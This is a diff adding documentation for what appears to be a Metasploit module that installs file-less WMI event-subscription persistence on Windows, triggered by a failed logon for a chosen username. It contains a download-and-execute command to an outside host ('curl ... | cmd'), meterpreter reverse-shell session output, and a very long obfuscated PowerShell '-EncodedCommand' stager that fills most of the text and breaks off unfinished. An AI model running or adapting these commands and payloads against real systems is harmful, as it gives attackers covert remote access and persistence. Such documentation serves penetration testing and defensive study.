diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md new file mode 100644 index 0000000000000..6e5cc5418d7ab --- /dev/null +++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md @@ -0,0 +1,158 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter +that will query the event log for an EVENT_ID_TRIGGER +(default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing +must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon +/failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_event_log` +4. Do: `set session #` +5. Do: `run` +6. Create a Windows event to trigger the event, such as an SMB Login +7. You should get a shell. + +## Options + +### EVENT_ID_TRIGGER + +Event ID to trigger the payload. Default: `4625` + +### USERNAME_TRIGGER + +The username to trigger the payload. Default: `BOB` + +### CLASSNAME + +WMI event class name. Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50187) at 2025-11-18 19:25:49 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > sysinfo +Computer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 18363). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence Install + +``` +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_event_log +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > exploit +[-] Msf::OptionValidateError One or more options failed to validate: SESSION. +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 1.1.1.1:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > [*] Installing Persistence... +[*] Powershell command length: 6767 +[-] Compressed size: 14204 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14204 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQB7ADEAfQBMAGcATwBIAFcAawBDAHsAMQB9ADYAVwBaAFQAVgBmAGIANgBwAEsARgAvADAAcgBQADAAcgAzAFcASABSAGgAaQB1AE8AawA3AEsAOQBuAHkAeAB3AEgAWgBrAGIAKwBJADMASwBzAEgAdAB1AEgAcQBKAEUANwB3AFMAUQB3AG8AOABPAHQANwBQAC8AdQBWAHoAWgBrADMARQB5ADAAagBxAGQANwA2ADMATABXAHIAOQBEAC8ANQA0ADgAdgBYAFgANABmAEgASAB3ACsAUABUAC8ALwA3AHIAMwAvAE4ASAA1ADcAKwA5AG8ALwBWADUAdABmAFgAegBmAGIANwB3ADMAOQArADYATwBqAHYAWQB2AHcAYQBuADIAZQBEACsAWgBjAFAALwAvAGoAdwBSAHgAMgBIAHsAMgB9AEIAeABqADEAMgBUAGYAWQBqAFMATwBUAFoAawAxAE0AUwBxAGoAcQByAE4AagBEAEQAOQBGADEAVwBTAC8AWQB0AEMASgBhAFIAMwBYAE0AUwB4AGkAVgAyAGYAZgBZADUAagBIAGYAZQBqAGEAcQArAE0AbQBzAG0AawBNAGwAMwBIAGYAeABGAFAAawBuADMAagB2AEoANwAvADEAWABpAGQANgBFAGMAcwBtAHUANABwAFIAawBaADQAZgBkAHUASwAyAHoAdgA3AGcATwBWADAAWABuAEgATwBTAHQAeQAyAHoAdQBkADgAcgBzAHoAMwBYAEgAWAByAGwAMwBWAGkAWAAyAGMAZgBvAGQAVwBMAFIAWgBGADkAagBlAE8ARAAzAE4AOQA0AGIAQgArAC8AdgAwAGIAdgBEADgAOQBzAHkAbgBpAFAAZgA2AHoAbQB1AFIAVwB5AGIANwBDAGwAewAyAH0AawBlAFQAcgBmAEQAMwAzAEYALwBaAHMAYQAnACsAJwArADcAdgA0AHEASABXADcANQBIADEANgAyAEMAMwA1AFAANgBKAGYAagBmAHgALwB6AG0AMwB3ADMATgBQAG4ASwBOAHoAcgAyAEoAZwB1ADEAOQBiAHUANQA3AHcAMQAyADEAawBXAC8ANwAvAFUAewAyAH0AWgB2AHkAUABQAHoAdgBXACcAKwAnADYAVQBUAGYAWQBTAHcAMgA3AGMAVwA5ADgAeAA3ADkAMQBIAC8AeQBDAC8AWgAwAE4AKwAyADUANQA4AGoASgB3ADMANQBFADMAcQA2AEwAegBMADMAOAB1AHUANwBEAEgARgBRAC8AcgAzAGQAagBFAFAAMwBaAGYAZABEADAAMwAnACsAJwA4AGoAbABFAG4AeQBqAEkAcgBZAHIAagBEAG4AbgBFAE0AZAByAEYAcABzAG4ANwBrAHUAZQBSAGsAWAAyAEoAdwBpAEUAbQBqAGEANwArAFcALwBIAGkATgB3AFQAagB1AEkAaAB2AEYAcQBJAHIAYgBCAG4AMABxADUATAB3AGkAWgA0ADcAZAA2AFgAMwA1AFEAWABFAEwAeABVAHUALwBUACsAZABJAGoANgBmAG8ANwAyAE4AVgBaADcALwB4ADcAMQAwAGQAbAArAGcAOQB3AFcAKwBEAGkAagBpAC8AYwBhADcAeQBZADAAMgBjADUAcABGADEATwBmACsAZQAvAE4AUAB2AGsAMwA3ADYALwBZAGkAKwBzADgAZwArAFIAMwA4AGMAdQB6AEoAZQBvAHIALwBEAFAAegA5AGkAVQBLAE8AdgAvAEYAMQBLAGoALwBpAEkAbgBaAFgAegBhAFIAbABGAHsAMgB9AFYAZgBJAFcAOQBlAFMASwAzAC8AcQAvADcALwBRAGYAMQBLAHsAMgB9ADgAbABoACsASwA3AFAAcgB7ADIAfQBCADMAUQA4ADcAbgBOAGkAeQB2AHUATAAyAHIANQAnACsAJwBVAGYAZgB2ADAAVgBmAFgAdwBuAEwATAB1ACcAKwAnAHsAMgB9AG4AaQBMAGYAcAA2AEwANgBLAEwAZgB3AHIAMAB7ADIAfQBGAGEANgBJAG4AOABaAFUAKwBJAG4ATwBYADgAMABrAGkAKwAvAHkAMQA5ADMATQBUAHAAeQAvADcAOQBqAE8ASQA1AEYAWgAnACsAJwBGAG4AMABqAHUAagBkAFIAWAAvAHAAVgBhAHsAMgB9AFgAcgAvAHIALwBvAGkAUwArAEYAZgBwAGMANABiAGMAZABlAHYAUQBWAFYAKwBUAEwANwBuACcAKwAnAHYAcQBvAGYAZQBKAC8ATABxAGkAJwArACcAYgBuAFQAZQBoAGUATwBLAC8AdABKAG4ASABaAEsARABYAHUAZwBwAGUAZQB0AFMAZQB2AGUAcgBwAFAAZQB3AEoAcgA5AGUAZQBVADkAeQBMAHEAawB6ACsAZQAwAEgAOQBpADkARABlAFMAMQA5AEMAdQBLAGsAOQA2AFMAMwA3AHsAMgB9AG4AMABIAHYASgBrAFgAMgBRAGwAegArAG4AMwBoAGUAcwBkAGUAYQBxAEwARgBmAGsAcAB2AFMAYgA0AHEAVgA5AEsATAB2ADYAdQBpAHsAMgB9ACsARgBuAHIATAB6AEsALwByAGYAKwB2AG0AUwAvAEoAUgBkAE8AWABKACsANAA0ADgAQwBmAHkAdAArAHMAcgA4AGcAcgB3AHYATAAyAGYATwBlADMAeQArAG8ATQA4AG0AVgBQAE4AZQBYADkAewAyAH0AcgBJAG4ANwBWAHgAcABrAE4AZQByAEgAbABlADkAcgA2AGsAOAA3AE0ATgBjAHQAZgBrAHQAKwBRAHEAcgAwAHIAOABXAGUATABIAG4ARABoAFMAdgB6AHYATwBWADMAeQBEADgAeQA3AFEAeAAvADUAVgBIAE8AZAAxAGwAcgBlADQAZAB4AHQANQBGAGIATgBhADkAaQBqAHUARQArADYAUABhAHAANwA3AHoASABtAFMATwA4AEkAdQBuAFQAUABDAGIANgB0AFMAZQB1AHUAYwBLAFgANgBWAHYAMQBRAFAAMQBtADkAQwAvAHYAYQBNAGcANAAvADQAUwAnACsAJwBYAEYAMQAvAHMANABiAG4AUwB0ADcAWgBuAFYAMgBnADcAOQAzADUAQgBkADEAVQBPAEwALwBUAHoAewAyAH0AagBmAGwASwBlAEwASAAyACsANwBaAE4AZQArAEUASAA2AEwAcQBqADMASABuAGIARQBZAHcAegAyAEMAVQAvADcAZgB2ADgAYQB1ADMAZgBvAE4AVABCAE8AMwBhAFgANABKAHYAOQBzAHUAVgBLAG4ASgBYAGgAUgBrADQALwBmADgAVQBOAFYASwAxACsAeABJAHkAUgBQADUALwA3AFIAeQB7ADEAfQA3AGkAQwAwADcAJwArACcASwAzAGoAVgB5AGgAMABmAGsAZgBrAG4ANQBRAGYAMABYADMASgA4ADYAagAyAHIAcABLADcAdQBsAHgAOQBGADUASABYAHAATwAvAHQAeQBDAFkAeQBOAGYAbAB5AGsAUAAnACsAJwBaAFQALwAxAFUARgBNAFAAWABaADUANwBiAHYAOQAvAFMAMQA1AHUANwBPACsASQB0AGUAdQA1AEYAbAA0AG8AUAArAFUAUABuAFQAOQBKAGUAcABJAEgAWQAzAEQAZwBCAG4AeQA5AHAANwAvADAAWAB7ADEAfQBmAEMAcAB4ADMAWABiADgAVABsAFYASAAvADMASQBiACsAZQAvAFMAUgBjAEkAagAvADcAagBxAHYAagBKAFgAOQBjAGsASwAvAFQASQBPADkAMgA1AE4AcwBFACsANgBhAGgALwBNAG0ATgBMADkAZgBZAHMAWABIAGQASABZAG4ALwBDAEwAeAAzAG4AQgBXAFgAQgArAFAAegB7ADEAfQBYADAASAB2AEMALwAvAGYAMgAzADcANABqAE4ANgAzAHIAWAA1ADcAagBvAHsAMQB9AGQAKwBxAEUATAA4AHEAegBiACsAUwBqAC8ATwBhADYATABtAHcAMwB1AEMAWQA4AFYARgB4AFcAJwArACcAZABUAFEAOABwAC8AeAA0AHcAOAArAEYAKwA4ADgAbgAvAHYAKwA3AHgAWQAwAHYANgBMAEUAdwBuAGkAMwBsAE4ALwBDADYAewAxAH0AcgA4AHEANAByAFkAaABIADkAVwBuADcARQAvAGwAeAB3AFEANQBpAHYALwBLAC8AUwBQAEgAagAzAGMAeABLAFAARgBIAEIAegB1ADIAMQBKAHsAMgB9AGUAVQAxAHkAbQBuAEwAOABrADcANABUADcAcQB2AHQAaAAyADcAKwArAGsAUAA5ADYAYgArADcAKwBGACsAbQBjAGUALwBKADEAMgBFAGsANABNADEAVAAnACsAJwAvAGEAcwBEAEwAUQAvAEwAWABZAEoAZgB3AFUAWABZAHMAagBZAFAAbQBFAGIAKwB4AGQAKwBiAGYAZQBlAG8AdgAwAHIAKwB5AG4AdwB2ADgAOQBJAEsALwBaAGwAegBwAFEAKwB7ADEAfQBrAGYAZwA4ADkAbgArAFEAMwBQAGgAOQAvAFMAdgA0AGMASABGAHsAMgB9ADgARgA2AEYANAA2AC8AOQAzADUASQBQAHcAZQBSAGYAaABlAHAAKwBDADgANQB4AFgAVQB1AGMAbABjAGYAdQBDADMAUQBWACsAVgBMACsAVQB2AFEAUAB3AGMAbQBvADgAewAxAH0AYwBlAGsAaAAvAEoAZAAvAHAAZwBUADEAMQBXAGcAVgB3AE4AdQBWACcAKwAnAE8AVAAvAHEAZQArAGwAKwBIAGIAcABkAHcAZgB5AFYAdQA5AGQAOABuAHYAcQBmAHQAegBCAGIAMQA4AGQAOQA1AHsAMQB9ACsAeQB0AHMAYgArAHEAYgB3AFQALwBXADIASQByACsARgBDADMAKwBpAGoAOAA1AGYAYwBaADcANwBrAGUAeAAwAFAAcgBtAFAAUwBOADkAVAAzAHMAcQB1AGwAWABGADYAagB6ADQAbAArAHQANQB4AHIAdgBKAGcAMABlAGIARABMAGgAUQAvACsAJwArACcAVwA5AEwALwBVAG0AKwA1AE8AdwBqAFAAOAB7ADEAfQByAC8AdQBMACsAQgBEADQAagAnACsAJwBQAFcAKwBRAG8AOQA5AGwAQwBSADQAMwA1AE0AOABTACcAKwAnAC8AZQBaADEAOAB1AE0AOQA5AGkAcgBmAE4AdABpAGoAdQBsAGkAOAA0ADAARQBYAFAAYwBUAEQAWABvAGoAagAxAFAAeQBzAHcAQwArAHYAMQBvAHQANgBrAEoAdwBaACsAQwB2ADkAVAB2AFYAWABFAEIAZAA0AEQAVAB4AHsAMQB9ADUANgBsAHUASgB5AG4AUAA1AFUAZgA1AFoAdwBzAGUAagA2AGgAegBuAGoAdABnADEANABTADQARgArADUAagBTADUANwB2ADAAcgBkAHUAdwAnACsAJwBRAC8AaQBVAGMAdAArACsAWABsAG0AUABsAEUAawBmAGoAUQB3ADcAbABUAEkAMwA0AEMAVAB3AG8AVQB0ACsASgByAHUALwB5ACcAKwAnAEIAUABWAHUAWQBQAFgAWABEADAAagBiAGoAUABzAEUALwB5AGQAUAAvAEMAZQBjAHIANQB1AGkANQByACsAaQBVADgATABuAFAAOQB5AEwANABqAGQAWABmAG4AdgBsAGsAVAA5ADcAMwA3AEQASABiAGwAeAB2AHMARABlAFYAbQBRAEYAdwBQAEgANQBVAGcAKwBxAHkANgBtAGIAVAArADUANABkAHkATgBlAGYATQBlAGYAbgBOAE4AZgBCAGIAbQBMADQAVgA0AFgAdQBJAFAAaQB0AGUAYQA5ADMAYgB1ADAAMgBQADAAYQA4AHsAMQB9AGYANABmAEkAcgAvAGwASAA5AC8AeQBJAFAAagBWAGYAOQB3AHsAMgB9ADgAbAA5AGIANQAyAFgAVABUAG8ATgBUAGEATwB0AEwAeQBvAHEAaABQAFAARgBrACsANQB3AGsANwBoAHcAawBmADgATQB5AFUAKwB1AFgAbAA4AG4ANwBnAFcANgBLAHYAcgB4AFAAVQBJAEwAeABJAE8ARAArAEUAVAA4AEIAMwB6AGcAcQBuAHIAaQBuAGkAYgBuAHkAYwBlAEoARAA3ADUAaABwACsAVgBUADMAdgB3AFEAWABhAC8AWQBlAGMATgBkAGcAcQBIADUAegB3AG4AdQB5AFMAMwBSAHgANwBPAG0AcwBRAFQAZABsAHoAbAAvADMAbgBiAHoANwBiAE8AcwB4AHAANwByADcASAB6AHgAQgB0ADMAZABlAHAAUABKADcAdwB2AGoAUQA5ADcAOABPAHIAeQAzAEQAOAB7ADIAfQA3AHUAUABmADMAdQBzAEUASABNAHsAMQB9AHYANQBEAGMAOABaAGMALwA5AEMAZQBmAGYAMABNAGMAUwBmAC8AMQBpADMASQBDAG4ASwBzADQAcgBlAEoAVABrAHEAMwA1ADYANgBIAHQARAAzADUARQBlAHsAMgB9ADkAYwA3AGYASQBsADgAewAyAH0AdQBQAGYAYQAvAHMAYgBmAFgAUABYAHQALwBtAHcAOABVADcAKwBmADQAQwBYAEsAawArAFcAVAAnACsAJwBlAG8AagA3AG8AOQBEADkANQBGAFgAOQB3AGQANAB3ADgAQgA5ADQAbwBiADYAVQBGADUAZgB0AEgAMwAzAEMAagAvAGMAawBwADgANQB1AEoAWgB3AHkAMwA1AFIAUABxAHoAQgBKADkAZABIADIAegA4ADgAdAA0AEQAegBPAGsAZgBuAE8AYgA0ADYAWgArAFUAKwA5AHkAbgBGAGIAVwBoAGMAJwArACcAZgBpAFoAUAB6AGUAdABTAFgASABOAHcAWgBZAFgAZABLAFMANAB2ADUATwAnACsAJwAzAEMAOAA4AEsATwBPAG4AOQBOAGYAWgBFACsAawBmAFAAOABKAGYAbQA1ADkAQgB3AFkAeAB7ADIAfQAvAFkAOABzAEoAdgB6AGcAdgA2AG4AZQBUAGUAVwA4ADYAQgB2AFAAUQBjAFkAcgB1AGsAOQA0AEwAbgBKAEYAOQArAE0AZgA0AHMASQAvAEUAdgArAGYAMgBIAGMAZAAxADUANgBIAHoAOABUAHYANgBzAHcATABPAGUANAA5AHEAeABIAGYAQwBjAFUANQB6ADcAdQA1AFIAWAB7ADEAfQArAE4AYQAzADMAMwBJAGUAcgBpAHYASABjAHcASAAnACsAJwA0AFYAVgBEADYALwBOAFAALwBQAGwAdgA4AHoAWAB5AGwAbgA1AFIASgBSADQAaABmAFUAcgB6ADcAbQBYAEMARABjAFYAaAAwAHYATABPAE8AZgBVAHoAZABQACsAZABNAG4AZQBJAGIAMQA2ADIAYwArAHsAMQB9AHYANgBtAGoAZQA4AHMAcwBUAC8AdQB1ADgAUAA5AEYANwAvAFYANgAvAEsALwB3ACsATgArAC8AcAA0AHEAKwAvAEUAaQA3AGcAagB3AHAAOQBuADUATgBmADAAaAB3AG0AZgBDAG4AcABCAHoAdgBqAFEAOABuAHoASwAvAHkAZAA4AEgAawBNAC8AbAA0AGsAZgBFADcAOQAyADMAMQB4AHUARQA4ADgAVgBIAGsAaQBQAEwAZwBpAGoANgBWACcAKwAnAEgARAA3ADkASgAzAG8AcgBuAEsAdQBOAFQAMABQAGQAUAB1AEwAMgBFAG4AJwArACcANgBsACsAYgA5AHAANABlAEsANwBWAGUALwA4AGsAegB2AC8AJwArACcAewAyAH0AUAB2AFgANQBPAFQAeABNAC8AcABLAGUAQgBYAGwAdwA1ADcANgB7ADEAfQB2ADgASgAxAFgAZQB7ADEAfQBuADkAQwBqAFAALwBsADAAUgBsADAAMgBaACsAcgBEADgAJwArACcATwBEAEsALwB4ADcAKwBLAFMAMQBrAG4AZgA3AG4AUABLAEgAOAAyADEASgAzAHcAYgBFAHYAOABVAGoAOABxAFAASABlAFoAZgB3AFIAKwAzAGgAaQB2ADcAQgBmADcAcwBlAGYANwBrACcAKwAnAGIAMgAwAGYAVwBsAEMAZgBPAGIAawBnAGYATABOAC8AYwBwADgAUQBmAG0AdQArAFcAeAByAGYAQgA5AGoAMwAwAHMANwBOAHkAeAA1AFQAcgArAC8AdQBkADgAegBOADYAUwA1ADgARAB2ADQAdAB5AE4AZQAwAG0AZgBUAHkAcAAwAHgAQgArAFIASAAvAFAANwBFADcAMQBQAC8ATQBxACsAewAxAH0AWAAzAGcAZQBMAEYATAA4ADAAdgB6AGkAUABuAC8AWAA4AHEANwBLAHYATAA3AHsAMQB9AHoAMQAvAG8ARQB6AHIAdgBKAHoAaQB4AG8AbQArAE0AaQBvAFMAVABJAC8AQgBMADgAMQAvAHkAVwB3AGUAYwBYAEYAewAyAH0ALwB5AHMAZgBTAC8AVAAyAG8ATAA4ADgAdgBFADMAQgBIACcAKwAnAGYAVwAxAEYAWABRAHAAZgA3AHAAZwAzAFIANAA3AC8AKwBJAHgAMwAnACsAJwB5AGcALwA1AHIAZQArACsAewAxAH0AOQA5AGkAdgB3AEgATwA5ADgAawB2ACsAcABQAG4AbgBVAHYAaQBtADMAQgB0AGQAOAA1AGYAOAA0AHYARQBiADkAZgBVADQAOAB6AG4AdAAzAE4AcQB3AGwAWABqADIAWgBTADYASABIAHAAZQBYADcAYQA0AFYAYQBIAEgARABmADAASAAzAGcAUAB1AEoAVABzAHYAOABNAGUAVwBQAHAAcgBpADkANAB3AGUAewAyAH0ALwBxAG4ANQB6AHIANgBjADUAMQA0AFkAYwBxAG4ATQBYADUATQA5AHMAewAyAH0ALwAyAFEAZgBVADYAewAyAH0AewAyAH0AOABxAGEAZwBiACsAcQA1ADUAcwBlAGYAWgBYACsAOAA0AGYAdwBSAHYAZgByAGQAegB3ADQAZwArAHYAewAyAH0ASwBPAFYARgAxAE0AUABjAGUANQAnACsAJwBqADMAZgB0AEIAOAA5AHoANwAvAE4AewAxAH0AeQBSAHcAagBmADgALwBCAHsAMQB9AC8AcQA0ADYANgAwAHsAMgB9AC8AMwArADAAKwA1AGIAWAA5AC8AbgBFAC8AZQAwAHsAMQB9AEgAdAB5ADMAKwA0AE0AbABmAEUANwAvAFgANwBvAHUARABvAGsAdgB3ADAALwBSAHQAMgAvACsAMQBmAGMAYwBUAHIAMwBJAGIAMQB2AGkAbwAvAGgATgB6AEMAYwByADgATQBYADkAZQBsADQAbgBmAE4AMwBDAGIALwBvAHQAZgBvAHkAVwBDAFkAYwB7ADIAfQA1AHAAKwBuACsAdgBUAGUAYQB7ADEAfQBPAGUANgA1AHcAWgAvAFUARABYAHAATAAvAG4AdgBvADMANQBTAHMAUABjAFYAeQBMAGYAZgBkAFgAeABrAGIAdwBTAHYAZwA4AHUARQArADkAQgBwAFAAMgBkADQAcgBFAEUAMwA5AEoAZQB6AGoAeABJADgAMgB2ADMANwB7ADIAfQBmAEYAbwBXAEIAUABrAGYARAA5AG0AcgBsADAAYQAvAHoATQB5AGYAZgBQADcAZAA3AGgATQB2AEYANAArAHEATgB4ADMASABPADgAOABzAEUAOABiAHQAcgBPAGcAUQAvADgAWgB1ADQARQAnACsAJwBwACcAKwAnADkAbQAzAHQASABQADkAMQBuAHcAQgBQAGcAdAArACcAKwAnAGUAaAA2AG8AMgBqADMATgBaACsAeABJACsAVwByACsANABUAGgAVgAyAEsAVgA4ADMAZABVAHAAMwA3AGYAawBzAGYASwBwAHAASAA4AHoAMwA1AGUAYwBWADUAMwBuADYAVwAxAGIARAB6AGQATgB3AHAAdABUADMAaABzADMAKwA1AEgAcQBCAHYAeQB1AEUAegA3ADUAbgBOAHgAOQA0AFIAWQBjAG0ASQBJAGoAaQB0AE4AOQBnADEAOQBPACsAZQB7ADEAfQA0ADUAdQBnAGoAUAAvAC8AawAvAHsAMQB9AHIALwBNAEsAOAAwAHEAVgA5AFAAeQBMAGUAaAA1ADgAdgBYAHQAaQArAGEAeAA5ADMAUQBMACsAbgBYADcATQBrAHsAMgB9AFoAZQBLAGgAZgBlAE4AVgBOADgAMgBOADgARQA3AHYAVgBUADYAZQA1ADQAcgB6AHUAZQBiAHgAUABlADUATAByADEATgBlAGYATwBmADgATgBmAGgAeABxAGcAdAA0AHAAZQB2AEsAKwA0ADcAZgByAGYAKwArAEUATABkADEAeQB3AE0AbgAnACsAJwArAE0AUAA4AFAAZgBIAGMASwBYAE4AbABmAGsAeAAxADIASQAvAHoAMwBzAGYAegBrAE8ASwB1ADkAOABmAGUASgB6AHAAJwArACcAZgB6AE0AZABLADYAcgAxAHMARQBuADYAdgA0AFcAbQBwADcAeAA3AGEAdgBCAGcAagBaADkARQAnACsAJwBrAG4ATgBoAFIARgA4AEsARABoAGYAZABvADcARABIAHgAZAA4AFcAYwAwAEgAVwA5AGwANABrAEgAcgBzAHgANwBQADMASAArADUAMwBiAC8AZAAnACsAJwBZAEYAOQBVAC8AdwBuACcAKwAnAC8ANQB6AG4AZQBlAFkALwA1AGkAYgB2AE0AUQByAG0ANQA1AGQAMgAzAHMAbABiAC8AOQA0AGcAdAAzAFIAOQBsAGMAVAA3AEUAdgAwAFQAegA5ADYAbABmAHUAMgArAHAASABxAFUALwBRAHYAcQA0ADcAdwBmAGEAUABjAFEAOAByAC8AMwBhAGUAWQBOADUAegA2ADYAZAAxADIAWAA0AHsAMgB9AFIASgAvAFgAZQBRAHQANABYAFAARAA0AHAAJwArACcAegBmAHQAMgBTAHQANwBLAG4AeABCADcATgB0AHkAYwArAFcAMwBqAFAAYQBCADcAMABmAE0AWgBaACsAZABIADkASgAnACsAJwBlAEgAZQAzAFAAMgBuAE8AJwArACcAWgAxAEgAMwAzAEYAZQBmAGkAZQBlAFcALwB7ADEAfQBuAE4ALwA5ADAAMwBhAC8ASgA4ADgAVAB2AEoAcAA3AFQAdwBNAHsAMgB9AGgAYwBYAEQASQAvAFYAbQBrAFAAVwBmAGEAMAAzADMANgArAHoANwBXAC8AZgByAHMAVAAzAGgAaABIAHoAOQBTAHAAMwBrADcAegB4AHoAWgBNAHoAagAvAE4ANQA1AHYAcQAxAFQAUABRADgALwBKAHsAMgB9ACsATQBZAGMAUgBKACsAYgBNAHkAJwArACcAdgBtAG4AYQAvAHkAdAB6AEYAKwBVAFgAYQAvADYAVwA1ADQAOQBKADcAWgBmAGgAdgBtAG8ALwBkADcAegBlAGUAeAB6ADAAdgBQAFYAdAB1AHkAYgB4AG4ASAB1AFEAKwBmAEUAcwArAEQAYQBMAHQAawAwAEUALwAyAGYAegBkAG4AdwAvAHcANwB6AFEALwBYAHMAUAAvAEgAdABqADMAUwAnACsAJwBwACcAKwAnADgAMQAvAHsAMgB9AHsAMgB9AHcAVAAzAHYATABvAGYAZABXAHAAMwBvAFoASQBPADkAawA5ADQAYgArAFQASgA4AHsAMQB9AFAAdwBiAGUASwA0ADQAOAA5AHcAZAA1ADQAWAA3AGcAUABEAHIAUABzAGUAWQB0ADMAbwA5AGMANABvADkAYgA4ADcAcwB1AGQAZQBuADkAdwBkAHkANABkAHEAcABEAGMARgAyADQASQBUAHQAMgA4AHsAMQB9AG4AagBLAC8AaQB3AEkAKwA5AGYAMAB7ADIAfQBQAGIANwBxADEASwAvAE0AaAArADAANwBqAFIATQBNADgAZABIAGYAYwA2ADcAVgBzADEAegA1ADMAeQBvAGQAUAB5AG0ARQBmAGoATQAzAFgAYQBkADkALwBQAHkAZQBPAEMAdQBoAHMAVwB5AFkANgBoADkAMABVAC8AaQBYAE4AbAAzAGwARQBuAHYAZgBYADgAZwAvAGUAaQA1AHEARgB2AEMAVwA4AHkAOAArAE0AMQBmAEMAOQA5AEoAOQBsADcATAArAFMANgBhADMAbAB2ADIAZwBPAC8AOABaADcAawBaAGQANABiAHUAawA4AFkAQgB4AC8AJwArACcAZABEAHoAMgBuAGUALwA5AHEALwBKADEANwA3AGoAcgB4AHcAWQBxADkAZAB0AFAAdQBwACsALwB7ADEAfQAyAGIAWAByAGUANQBuAHEATgBQAGYAegBGAFgAcQBYAFQAZABxAFAAegArAEYAdABuAG8AZABVAGoAegByAHYAdwBiAHoATQA3ADMAMwAwAFAARQBKACsAcAA3ADcAcgAvAGYAaQBNADUAeABYAFAARgBYADIALwA1AC8AMwAyADgAUgB3AFAAKwB7ADIAfQBDAGQAKwBNAHMAVQBIAEQAMwB6AG4ARAByADEASgBkAFgAegBpAHIAawBYAGYAbABPAG0AZgBmAGkARAA1ACsAMgAyAHIAZwBiAGUATgAvAGYAYQBQAHYAZgBhADQAdABPAFQAMwAvAGQAMwBoAHsAMQB9AEsAOQB4AHMANABIAGMASgBJADkAcABuAG0AaQArAGQATABQAFYAcwArAHYANQBNACsAUwB2AFcATAAvAGYAYwA2AGQAZQBZADkAdwA1AEgAMwB2AE4AZQBiAGcAcQB2ADMATgArADgAdAB6AC8AcgBsAFAANQB1ADcATABQAGUAcgBsAHsAMQB9AGQANgBoAC8ASwA2AG8ASwArAHIATABmAGUAcgBRADcAawBGAFUAbAA1AEgAMgBTAFoAcQByAEIAcwBpADkANQBUAHoAOQAzADkAOQB4AGgAdAAyADAARAAwAGsAOABZAGsA